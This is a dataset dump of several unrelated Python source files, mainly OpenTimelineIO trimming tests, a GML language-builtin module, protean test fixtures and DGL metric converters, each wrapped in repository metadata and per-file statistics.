| 18 | 24 | 0.712963 | 15 | 108 | 5.133333 | 0.466667 | 0.519481 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.185185 | 108 | 5 | 25 | 21.6 | 0.875 | 0.175926 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8153b5c2ea7cbb323e71a44b5da8b65b255e9fe0 | 14,891 | py | Python | tests/test_timeline_algo.py | michdolan/OpenTimelineIO | 1ec6f07f1af525ba4ca0aa91e01e5939d6237f01 | [
"Apache-2.0"
] | null | null | null | tests/test_timeline_algo.py | michdolan/OpenTimelineIO | 1ec6f07f1af525ba4ca0aa91e01e5939d6237f01 | [
"Apache-2.0"
] | 4 | 2022-03-09T22:28:42.000Z | 2022-03-14T15:16:50.000Z | tests/test_timeline_algo.py | michdolan/OpenTimelineIO | 1ec6f07f1af525ba4ca0aa91e01e5939d6237f01 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
#
# SPDX-License-Identifier: Apache-2.0
# Copyright Contributors to the OpenTimelineIO project
"""Test file for the track algorithms library."""
import unittest
import opentimelineio as otio
import opentimelineio.test_utils as otio_test_utils
class TimelineTrimmingTests(unittest.TestCase, otio_test_utils.OTIOAssertions):
""" test harness for timeline trimming function """
def make_sample_timeline(self):
result = otio.adapters.read_from_string(
"""
{
"OTIO_SCHEMA": "Timeline.1",
"metadata": {},
"name": null,
"tracks": {
"OTIO_SCHEMA": "Stack.1",
"children": [
{
"OTIO_SCHEMA": "Track.1",
"children": [
{
"OTIO_SCHEMA": "Clip.1",
"effects": [],
"markers": [],
"media_reference": null,
"metadata": {},
"name": "A",
"source_range": {
"OTIO_SCHEMA": "TimeRange.1",
"duration": {
"OTIO_SCHEMA": "RationalTime.1",
"rate": 24,
"value": 50
},
"start_time": {
"OTIO_SCHEMA": "RationalTime.1",
"rate": 24,
"value": 0.0
}
}
},
{
"OTIO_SCHEMA": "Clip.1",
"effects": [],
"markers": [],
"media_reference": null,
"metadata": {},
"name": "B",
"source_range": {
"OTIO_SCHEMA": "TimeRange.1",
"duration": {
"OTIO_SCHEMA": "RationalTime.1",
"rate": 24,
"value": 50
},
"start_time": {
"OTIO_SCHEMA": "RationalTime.1",
"rate": 24,
"value": 0.0
}
}
},
{
"OTIO_SCHEMA": "Clip.1",
"effects": [],
"markers": [],
"media_reference": null,
"metadata": {},
"name": "C",
"source_range": {
"OTIO_SCHEMA": "TimeRange.1",
"duration": {
"OTIO_SCHEMA": "RationalTime.1",
"rate": 24,
"value": 50
},
"start_time": {
"OTIO_SCHEMA": "RationalTime.1",
"rate": 24,
"value": 0.0
}
}
}
],
"effects": [],
"kind": "Video",
"markers": [],
"metadata": {},
"name": "Sequence1",
"source_range": null
}
],
"effects": [],
"markers": [],
"metadata": {},
"name": "tracks",
"source_range": null
}
}""",
"otio_json"
)
return result, result.tracks[0]
def test_trim_to_existing_range(self):
original_timeline, original_track = self.make_sample_timeline()
self.assertEqual(
original_track.trimmed_range(),
otio.opentime.TimeRange(
start_time=otio.opentime.RationalTime(0, 24),
duration=otio.opentime.RationalTime(150, 24)
)
)
# trim to the exact range it already has
trimmed = otio.algorithms.timeline_trimmed_to_range(
original_timeline,
otio.opentime.TimeRange(
start_time=otio.opentime.RationalTime(0, 24),
duration=otio.opentime.RationalTime(150, 24)
)
)
# it shouldn't have changed at all
self.assertIsOTIOEquivalentTo(original_timeline, trimmed)
def test_trim_to_longer_range(self):
original_timeline, original_track = self.make_sample_timeline()
# trim to a larger range
trimmed = otio.algorithms.timeline_trimmed_to_range(
original_timeline,
otio.opentime.TimeRange(
start_time=otio.opentime.RationalTime(-10, 24),
duration=otio.opentime.RationalTime(160, 24)
)
)
# it shouldn't have changed at all
self.assertJsonEqual(original_timeline, trimmed)
def test_trim_front(self):
original_timeline, original_track = self.make_sample_timeline()
# trim off the front (clip A and part of B)
trimmed = otio.algorithms.timeline_trimmed_to_range(
original_timeline,
otio.opentime.TimeRange(
start_time=otio.opentime.RationalTime(60, 24),
duration=otio.opentime.RationalTime(90, 24)
)
)
self.assertNotEqual(original_timeline, trimmed)
trimmed = trimmed.tracks[0]
self.assertEqual(len(trimmed), 2)
self.assertEqual(
trimmed.trimmed_range(),
otio.opentime.TimeRange(
start_time=otio.opentime.RationalTime(0, 24),
duration=otio.opentime.RationalTime(90, 24)
)
)
# did clip B get trimmed?
self.assertEqual(trimmed[0].name, "B")
self.assertEqual(
trimmed[0].trimmed_range(),
otio.opentime.TimeRange(
start_time=otio.opentime.RationalTime(10, 24),
duration=otio.opentime.RationalTime(40, 24)
)
)
# clip C should have been left alone
self.assertIsOTIOEquivalentTo(trimmed[1], original_track[2])
def test_trim_end(self):
original_timeline, original_track = self.make_sample_timeline()
# trim off the end (clip C and part of B)
trimmed_timeline = otio.algorithms.timeline_trimmed_to_range(
original_timeline,
otio.opentime.TimeRange(
start_time=otio.opentime.RationalTime(0, 24),
duration=otio.opentime.RationalTime(90, 24)
)
)
# rest of the tests are on the track
trimmed = trimmed_timeline.tracks[0]
self.assertNotEqual(original_timeline, trimmed)
self.assertEqual(len(trimmed), 2)
self.assertEqual(
trimmed.trimmed_range(),
otio.opentime.TimeRange(
start_time=otio.opentime.RationalTime(0, 24),
duration=otio.opentime.RationalTime(90, 24)
)
)
# clip A should have been left alone
self.assertIsOTIOEquivalentTo(trimmed[0], original_track[0])
# did clip B get trimmed?
self.assertEqual(trimmed[1].name, "B")
self.assertEqual(
trimmed[1].trimmed_range(),
otio.opentime.TimeRange(
start_time=otio.opentime.RationalTime(0, 24),
duration=otio.opentime.RationalTime(40, 24)
)
)
def test_trim_with_transitions(self):
original_timeline, original_track = self.make_sample_timeline()
self.assertEqual(
otio.opentime.RationalTime(150, 24),
original_timeline.duration()
)
self.assertEqual(len(original_track), 3)
# add a transition
tr = otio.schema.Transition(
in_offset=otio.opentime.RationalTime(12, 24),
out_offset=otio.opentime.RationalTime(20, 24)
)
original_track.insert(1, tr)
self.assertEqual(len(original_track), 4)
self.assertEqual(
otio.opentime.RationalTime(150, 24),
original_timeline.duration()
)
# if you try to sever a Transition in the middle it should fail
with self.assertRaises(otio.exceptions.CannotTrimTransitionsError):
trimmed = otio.algorithms.timeline_trimmed_to_range(
original_timeline,
otio.opentime.TimeRange(
start_time=otio.opentime.RationalTime(5, 24),
duration=otio.opentime.RationalTime(50, 24)
)
)
with self.assertRaises(otio.exceptions.CannotTrimTransitionsError):
trimmed = otio.algorithms.timeline_trimmed_to_range(
original_timeline,
otio.opentime.TimeRange(
start_time=otio.opentime.RationalTime(45, 24),
duration=otio.opentime.RationalTime(50, 24)
)
)
trimmed = otio.algorithms.timeline_trimmed_to_range(
original_timeline,
otio.opentime.TimeRange(
start_time=otio.opentime.RationalTime(25, 24),
duration=otio.opentime.RationalTime(50, 24)
)
)
self.assertNotEqual(original_timeline, trimmed)
expected = otio.adapters.read_from_string(
"""
{
"OTIO_SCHEMA": "Timeline.1",
"metadata": {},
"name": null,
"tracks": {
"OTIO_SCHEMA": "Stack.1",
"children": [
{
"OTIO_SCHEMA": "Track.1",
"children": [
{
"OTIO_SCHEMA": "Clip.1",
"effects": [],
"markers": [],
"media_reference": null,
"metadata": {},
"name": "A",
"source_range": {
"OTIO_SCHEMA": "TimeRange.1",
"duration": {
"OTIO_SCHEMA": "RationalTime.1",
"rate": 24,
"value": 25
},
"start_time": {
"OTIO_SCHEMA": "RationalTime.1",
"rate": 24,
"value": 25.0
}
}
},
{
"OTIO_SCHEMA": "Transition.1",
"in_offset": {
"OTIO_SCHEMA": "RationalTime.1",
"rate": 24,
"value": 12
},
"metadata": {},
"name": null,
"out_offset": {
"OTIO_SCHEMA": "RationalTime.1",
"rate": 24,
"value": 20
},
"transition_type": null
},
{
"OTIO_SCHEMA": "Clip.1",
"effects": [],
"markers": [],
"media_reference": null,
"metadata": {},
"name": "B",
"source_range": {
"OTIO_SCHEMA": "TimeRange.1",
"duration": {
"OTIO_SCHEMA": "RationalTime.1",
"rate": 24,
"value": 25
},
"start_time": {
"OTIO_SCHEMA": "RationalTime.1",
"rate": 24,
"value": 0.0
}
}
}
],
"effects": [],
"kind": "Video",
"markers": [],
"metadata": {},
"name": "Sequence1",
"source_range": null
}
],
"effects": [],
"markers": [],
"metadata": {},
"name": "tracks",
"source_range": null
}
}
""",
"otio_json"
)
self.assertJsonEqual(expected, trimmed)
if __name__ == '__main__':
unittest.main()
| 41.479109 | 79 | 0.367067 | 964 | 14,891 | 5.494813 | 0.153527 | 0.090617 | 0.126864 | 0.052105 | 0.808571 | 0.773834 | 0.745516 | 0.715311 | 0.662828 | 0.651123 | 0 | 0.030715 | 0.545229 | 14,891 | 358 | 80 | 41.594972 | 0.751477 | 0.042979 | 0 | 0.489362 | 0 | 0 | 0.004767 | 0 | 0 | 0 | 0 | 0 | 0.170213 | 1 | 0.042553 | false | 0 | 0.021277 | 0 | 0.078014 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
81568238826ba84fa7ca22f8a891a533290f3075 | 43 | py | Python | ma_gym/wrappers/__init__.py | prasuchit/ma-gym | 1b2e76452f3e124aa2b049a78fc4f9eaa383e986 | [
"Apache-2.0"
] | 310 | 2019-08-17T21:27:36.000Z | 2022-03-28T16:47:21.000Z | ma_gym/wrappers/__init__.py | prasuchit/ma-gym | 1b2e76452f3e124aa2b049a78fc4f9eaa383e986 | [
"Apache-2.0"
] | 26 | 2019-08-25T16:31:56.000Z | 2022-03-31T17:50:30.000Z | ma_gym/wrappers/__init__.py | nekoaruku/ma-gym | 1c94623571cb81298e8515c99fef70a2fee5df3d | [
"Apache-2.0"
] | 63 | 2019-08-20T11:59:24.000Z | 2022-03-06T17:35:50.000Z | from ma_gym.wrappers.monitor import Monitor | 43 | 43 | 0.883721 | 7 | 43 | 5.285714 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.069767 | 43 | 1 | 43 | 43 | 0.925 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
81afccea14c8ee88442cdd63f74652a57393f20a | 74 | py | Python | torchwisdom/core/trainer/__init__.py | nunenuh/modelzoo.pytorch | 0a0e5dda84d59243a084b053d98f2eabd76474f5 | [
"MIT"
] | 8 | 2019-03-23T17:53:52.000Z | 2021-06-15T17:38:00.000Z | torchwisdom/core/trainer/__init__.py | nunenuh/modelzoo.pytorch | 0a0e5dda84d59243a084b053d98f2eabd76474f5 | [
"MIT"
] | 39 | 2019-03-26T08:22:40.000Z | 2019-05-22T05:18:31.000Z | torchwisdom/core/trainer/__init__.py | nunenuh/modelzoo.pytorch | 0a0e5dda84d59243a084b053d98f2eabd76474f5 | [
"MIT"
] | 4 | 2019-04-05T06:32:09.000Z | 2019-05-09T14:53:51.000Z | from .base import *
from .supervise import *
from .semi_supervise import * | 24.666667 | 29 | 0.77027 | 10 | 74 | 5.6 | 0.5 | 0.357143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.148649 | 74 | 3 | 29 | 24.666667 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
81c171cefde002c9f77f8c9aadb4cbee825e288d | 198 | py | Python | dobble_bot.py | rbrunt/dobble-bot | 4330e2ca2bcd5f54ef5dc9fff40767960b1cf7bb | [
"MIT"
] | null | null | null | dobble_bot.py | rbrunt/dobble-bot | 4330e2ca2bcd5f54ef5dc9fff40767960b1cf7bb | [
"MIT"
] | null | null | null | dobble_bot.py | rbrunt/dobble-bot | 4330e2ca2bcd5f54ef5dc9fff40767960b1cf7bb | [
"MIT"
] | null | null | null | from dobble import Symbols
print Symbols.ANCHOR.name
print Symbols.NO_ENTRY.name
print Symbols.NO_ENTRY.alternative_names
print Symbols.NO_ENTRY.get_img_path()
print Symbols.CLOCK.get_img_path()
| 19.8 | 40 | 0.843434 | 32 | 198 | 4.96875 | 0.46875 | 0.377358 | 0.264151 | 0.358491 | 0.289308 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.085859 | 198 | 9 | 41 | 22 | 0.878453 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.166667 | null | null | 0.833333 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
c4b42f2aee28cc150fbd6c587b1ad1d99c175b9a | 6,160 | py | Python | src/python/lib/lang.py | hindsights/gml | 876810c9dc3a33731e0df9dce9dfd68a655c6330 | [
"MIT"
] | 3 | 2018-03-01T13:34:00.000Z | 2018-04-02T03:02:22.000Z | src/python/lib/lang.py | hindsights/gml | 876810c9dc3a33731e0df9dce9dfd68a655c6330 | [
"MIT"
] | null | null | null | src/python/lib/lang.py | hindsights/gml | 876810c9dc3a33731e0df9dce9dfd68a655c6330 | [
"MIT"
] | null | null | null |
import basetype
import ast
class LibFuncMatch(basetype.LibFunc):
def __init__(self):
basetype.LibFunc.__init__(self, None, 'match()')
self.spec.static = True
def evaluateCall(self, visitor, callinfo):
# visitor.logger.debug('LibFuncMatch.evaluateCall start', callinfo.caller, callinfo.args)
argcount = len(callinfo.args)
assert argcount in [1, 2]
caseblock = callinfo.args[-1]
casevar = None
if argcount == 1:
casevar = visitor.getThis()
else:
casevar = callinfo.args[0].visit(visitor)
assert casevar, (callinfo, callinfo.args, caseblock.entries)
# visitor.logger.debug('LibFuncMatch.evaluateCall', casevar, casevar.cls, caseblock.entries)
entry = visitor.matchClasses(casevar.cls, caseblock.entries, callinfo.getOwnerFunc().name, argcount)
assert entry, (casevar, caseblock, callinfo)
# visitor.logger.debug('LibFuncMatch found entry', entry, casevar, casevar.cls, caseblock, callinfo, callinfo.getOwnerFunc())
return entry.visit(visitor)
def resolveNameRef(self, visitor, callinfo):
# visitor.logger.debug('LibFuncMatch.resolveNameRef', self, visitor, callinfo, callinfo.getOwnerFunc(), callinfo.caller, callinfo.args)
# assert False
callinfo.getOwnerFunc().info.dispatched = True
argcount = len(callinfo.args)
assert argcount in [1, 2]
caseblock = callinfo.args[-1]
assert isinstance(caseblock, ast.CaseBlock)
if argcount == 2:
caseblock.matchVar = callinfo.args[0]
for entry in caseblock.entries:
if entry.pattern:
assert hasattr(entry.pattern, 'name'), ('match resolve entry', callinfo.caller, caseblock.matchVar, entry.pattern, callinfo.getOwnerFunc())
assert hasattr(caseblock.matchVar, 'name'), ('match resolve matchVar', callinfo.caller, caseblock.matchVar, entry.pattern, callinfo.getOwnerFunc())
# casevar = ast.CaseVarSpec(ast.Param(caseblock.matchVar.name, ast.UserType([entry.pattern.name])))
entry.pattern = ast.VarTag(caseblock.matchVar.name, ast.UserType([entry.pattern.name]))
# visitor.logger.debug('match resolve entry', callinfo.caller, caseblock.matchVar, entry.pattern, callinfo.getOwnerFunc())
visitor.setupNewItem(entry.pattern, entry, False)
class LibFuncSwitch(basetype.LibFunc):
def __init__(self):
basetype.LibFunc.__init__(self, None, 'switch()')
self.spec.static = True
def evaluateCall(self, visitor, callinfo):
# visitor.logger.debug('LibFuncMatch.evaluateCall start', callinfo.caller, callinfo.args)
argcount = len(callinfo.args)
assert argcount == 2, "evaluateCall"
caseblock = callinfo.args[-1]
casevar = None
if argcount == 1:
casevar = visitor.getThis()
else:
casevar = callinfo.args[0].visit(visitor)
assert casevar, (callinfo, callinfo.args)
# visitor.logger.debug('LibFuncMatch.evaluateCall', casevar, casevar.cls)
entry = visitor.matchClasses(casevar.cls, caseblock.entries, callinfo.getOwnerFunc().name)
assert entry, (casevar, caseblock, callinfo)
# visitor.logger.debug('LibFuncMatch found entry', entry, casevar, casevar.cls, caseblock, callinfo, callinfo.getOwnerFunc())
return entry.visit(visitor)
def resolveNameRef(self, visitor, callinfo):
# assert False
# visitor.logger.debug('LibFuncMatch.resolveNameRef', self, visitor, callinfo)
callinfo.getOwnerFunc().info.dispatched = True
argcount = len(callinfo.args)
assert argcount == 2
caseblock = callinfo.args[-1]
assert isinstance(caseblock, ast.CaseBlock)
if argcount == 2:
caseblock.matchVar = callinfo.args[0]
for entry in caseblock.entries:
# visitor.logger.debug('match resolve entry', callinfo.caller, caseblock.matchVar, entry.pattern, callinfo.getOwnerFunc())
assert hasattr(entry.pattern, 'name'), ('match resolve entry', callinfo.caller, caseblock.matchVar, entry.pattern, callinfo.getOwnerFunc())
assert hasattr(caseblock.matchVar, 'name'), ('match resolve matchVar', callinfo.caller, caseblock.matchVar, entry.pattern, callinfo.getOwnerFunc())
casevar = ast.CaseVarSpec(ast.Param(caseblock.matchVar.name, ast.UserType([entry.pattern.name])))
entry.addSymbol(casevar.variable)
casevar.setOwner(entry)
visitor.visitNewItem(casevar)
class LibFuncAssert(basetype.LibFunc):
def __init__(self):
basetype.LibFunc.__init__(self, None, 'assert()')
self.spec.static = True
def evaluateCall(self, visitor, callinfo):
expr = callinfo.args[0].visit(visitor)
# assert expr, (callinfo.getOwnerFunc(), callinfo.getOwnerClass())
if len(callinfo.args) == 1:
assert expr, (callinfo.args[1].visit(visitor), callinfo.getOwnerFunc(), callinfo.getOwnerClass())
msgs = [arg.visit(visitor) for arg in callinfo.args[1:]]
assert expr, tuple(msgs + ["==============", callinfo.getOwnerFunc(), callinfo.getOwnerClass()])
class LibFuncWith(basetype.LibFunc):
def __init__(self):
basetype.LibFunc.__init__(self, None, 'with()')
self.spec.static = True
def evaluateCall(self, visitor, callinfo):
expr = callinfo.args[0].visit(visitor)
assert len(callinfo.args) == 2, (self, callinfo)
assert isinstance(callinfo.args[1], ast.Closure), (self, callinfo)
assert expr, (callinfo.getOwnerFunc(), callinfo.getOwnerClass())
assert False
msgs = [arg.visit(visitor) for arg in callinfo.args[1:]]
assert expr, tuple(msgs + [callinfo.getOwnerFunc(), callinfo.getOwnerClass()])
def loadAll():
unit = ast.createLibUnit('sys.lang', [])
print('sys.core.loadAll sys.lang', unit)
unit.definitions.extend([LibFuncMatch(), LibFuncAssert(), LibFuncWith(), LibFuncSwitch()])
return unit
| 54.035088 | 167 | 0.659253 | 636 | 6,160 | 6.334906 | 0.128931 | 0.07446 | 0.044676 | 0.059568 | 0.839662 | 0.829983 | 0.806155 | 0.805907 | 0.764706 | 0.764706 | 0 | 0.00539 | 0.216883 | 6,160 | 113 | 168 | 54.513274 | 0.829809 | 0.199351 | 0 | 0.608696 | 0 | 0 | 0.037836 | 0 | 0 | 0 | 0 | 0 | 0.26087 | 1 | 0.119565 | false | 0 | 0.021739 | 0 | 0.217391 | 0.01087 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
481ebaadc74d5c4e081941a21a8642f09e3a0d35 | 1,512 | py | Python | tests/identity/conftest.py | proteanhq/protean | 2006832265435cad8d4f9b86d1a789d8828d2707 | [
"BSD-3-Clause"
] | 6 | 2018-09-26T04:54:09.000Z | 2022-03-30T01:01:45.000Z | tests/identity/conftest.py | proteanhq/protean | 2006832265435cad8d4f9b86d1a789d8828d2707 | [
"BSD-3-Clause"
] | 261 | 2018-09-20T09:53:33.000Z | 2022-03-08T17:43:04.000Z | tests/identity/conftest.py | proteanhq/protean | 2006832265435cad8d4f9b86d1a789d8828d2707 | [
"BSD-3-Clause"
] | 6 | 2018-07-22T07:09:15.000Z | 2021-02-02T05:17:23.000Z | import os
import pytest
@pytest.fixture
def test_domain_with_string_identity():
from protean.domain import Domain
domain = Domain("Test")
# Construct relative path to config file
current_path = os.path.abspath(os.path.dirname(__file__))
config_path = os.path.join(current_path, "./config_string.py")
if os.path.exists(config_path):
domain.config.from_pyfile(config_path)
with domain.domain_context():
yield domain
@pytest.fixture
def test_domain_with_int_identity():
from protean.domain import Domain
domain = Domain("Test")
# Construct relative path to config file
current_path = os.path.abspath(os.path.dirname(__file__))
config_path = os.path.join(current_path, "./config_int.py")
if os.path.exists(config_path):
domain.config.from_pyfile(config_path)
with domain.domain_context():
yield domain
@pytest.fixture
def test_domain_with_uuid_identity():
from protean.domain import Domain
domain = Domain("Test")
# Construct relative path to config file
current_path = os.path.abspath(os.path.dirname(__file__))
config_path = os.path.join(current_path, "./config_uuid.py")
if os.path.exists(config_path):
domain.config.from_pyfile(config_path)
with domain.domain_context():
yield domain
@pytest.fixture(autouse=True)
def run_around_tests(test_domain):
yield
if "default" in test_domain.providers:
test_domain.providers["default"]._data_reset()
| 23.625 | 66 | 0.714286 | 204 | 1,512 | 5.02451 | 0.196078 | 0.070244 | 0.058537 | 0.058537 | 0.849756 | 0.849756 | 0.820488 | 0.820488 | 0.820488 | 0.820488 | 0 | 0 | 0.183201 | 1,512 | 63 | 67 | 24 | 0.82996 | 0.07672 | 0 | 0.648649 | 0 | 0 | 0.053879 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.108108 | false | 0 | 0.135135 | 0 | 0.243243 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
48599c17dfcfe1ed5090cfca6d559282f8b08edc | 3,481 | py | Python | metrics/preprocess.py | MauTrib/gnn-en-folie | 3ca639919a2b285a41641717f4131107c015b510 | [
"Apache-2.0"
] | null | null | null | metrics/preprocess.py | MauTrib/gnn-en-folie | 3ca639919a2b285a41641717f4131107c015b510 | [
"Apache-2.0"
] | null | null | null | metrics/preprocess.py | MauTrib/gnn-en-folie | 3ca639919a2b285a41641717f4131107c015b510 | [
"Apache-2.0"
] | null | null | null | import torch
import dgl
from toolbox.conversions import edge_format_to_dense_tensor
def fulledge_converter(raw_scores, target, data=None, **kwargs):
if isinstance(target, dgl.DGLGraph):
if len(raw_scores)==target.num_edges():
proba = torch.softmax(raw_scores,dim=-1)
proba_of_being_1 = proba[:,1]
target.edata['inferred'] = proba_of_being_1
unbatched_graphs = dgl.unbatch(target)
l_inferred = [edge_format_to_dense_tensor(graph.edata['inferred'], graph) for graph in unbatched_graphs]
l_targets = [edge_format_to_dense_tensor(graph.edata['solution'], graph).squeeze() for graph in unbatched_graphs]
l_adjacency = [edge_format_to_dense_tensor(torch.ones(graph.num_edges()),graph) for graph in unbatched_graphs]
else:
raise NotImplementedError(f"Didn't implement Node->Full Edge converter")
else:
assert data is not None, "No data, can't find adjacency"
assert data.ndim==4, "Data not recognized"
adjacency = data[:,:,:,1]
l_inferred = [rs for rs in raw_scores]
l_targets = [edge_format_to_dense_tensor(graph.edata['solution'], graph).squeeze() for graph in unbatched_graphs]
l_adjacency = [a for a in adjacency]
return l_inferred, l_targets, l_adjacency
def edgefeat_converter(raw_scores, target, data=None, **kwargs):
if isinstance(target, dgl.DGLGraph):
if len(raw_scores)==target.num_edges():
proba = torch.softmax(raw_scores,dim=-1)
proba_of_being_1 = proba[:,1]
target.edata['inferred'] = proba_of_being_1
unbatched_graphs = dgl.unbatch(target)
l_inferred = [graph.edata['inferred'] for graph in unbatched_graphs]
l_target = [graph.edata['solution'].squeeze() for graph in unbatched_graphs]
l_adjacency = [graph.edges() for graph in unbatched_graphs]
else:
raise NotImplementedError(f"Didn't implement Node -> Edge Feat converter")
else:
assert data is not None, "No data, can't find adjacency"
assert data.ndim==4, "Data not recognized"
adjacency = data[:,:,:,1]
l_adjacency = [(torch.where(adj>0)) for adj in adjacency]
l_inferred = [ graph[src,dst] for (graph,(src,dst)) in zip(raw_scores,l_adjacency)]
l_target = [ graph[src,dst] for (graph,(src,dst)) in zip(target,l_adjacency)]
return l_inferred, l_target, l_adjacency
def node_converter(raw_scores, target, data=None, **kwargs):
if isinstance(target, dgl.DGLGraph):
proba = torch.softmax(raw_scores,dim=-1)
proba_of_being_1 = proba[:,1]
target.ndata['inferred'] = proba_of_being_1
unbatched_graphs = dgl.unbatch(target)
l_inferred = [graph.ndata['inferred'] for graph in unbatched_graphs]
l_target = [graph.ndata['solution'].squeeze() for graph in unbatched_graphs]
l_adjacency = [graph.edges() for graph in unbatched_graphs]
else:
assert data is not None, "No data, can't find adjacency"
assert data.ndim==4, "Data not recognized. Should be (batch size, n_vertices, n_vertices, N_Features)"
adjacency = data[:,:,:,1]
l_adjacency = [(torch.where(adj>0)) for adj in adjacency]
l_inferred = [raw_score.squeeze(-1) for raw_score in raw_scores]
l_target = [cur_target for cur_target in target]
return l_inferred, l_target, l_adjacency
| 52.742424 | 125 | 0.665326 | 476 | 3,481 | 4.647059 | 0.178571 | 0.088156 | 0.045208 | 0.085895 | 0.842224 | 0.806058 | 0.790235 | 0.746383 | 0.746383 | 0.678571 | 0 | 0.007786 | 0.225223 | 3,481 | 66 | 126 | 52.742424 | 0.812384 | 0 | 0 | 0.616667 | 0 | 0 | 0.106261 | 0 | 0 | 0 | 0 | 0 | 0.1 | 1 | 0.05 | false | 0 | 0.05 | 0 | 0.15 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4863db9bb4da731555bdb414f985244355b017a1 | 151 | py | Python | shapecutter/providers/__init__.py | informatics-lab/shapecutter | f974ec3b5858203bb3312463ebb55d33096cb798 | [
"BSD-3-Clause"
] | null | null | null | shapecutter/providers/__init__.py | informatics-lab/shapecutter | f974ec3b5858203bb3312463ebb55d33096cb798 | [
"BSD-3-Clause"
] | null | null | null | shapecutter/providers/__init__.py | informatics-lab/shapecutter | f974ec3b5858203bb3312463ebb55d33096cb798 | [
"BSD-3-Clause"
] | null | null | null | """Provider classes for data and geometry sources."""
from .data import select_best_data_provider
from .geometry import select_best_geometry_provider
| 30.2 | 53 | 0.834437 | 21 | 151 | 5.714286 | 0.52381 | 0.2 | 0.266667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.10596 | 151 | 4 | 54 | 37.75 | 0.888889 | 0.311258 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
4868aaa3e94aee9c9eaee087205e39e83bdfabc2 | 140 | py | Python | snakr/bigquery.py | bretlowery/snakr | eee58a18df2e194b72b5dc07cc5a27856f49593c | [
"BSD-3-Clause"
] | 1 | 2016-11-27T23:31:33.000Z | 2016-11-27T23:31:33.000Z | snakr/bigquery.py | bretlowery/snakr | eee58a18df2e194b72b5dc07cc5a27856f49593c | [
"BSD-3-Clause"
] | null | null | null | snakr/bigquery.py | bretlowery/snakr | eee58a18df2e194b72b5dc07cc5a27856f49593c | [
"BSD-3-Clause"
] | null | null | null | from googleapiclient.discovery import build
from googleapiclient.errors import HttpError
from oauth2client.client import GoogleCredentials
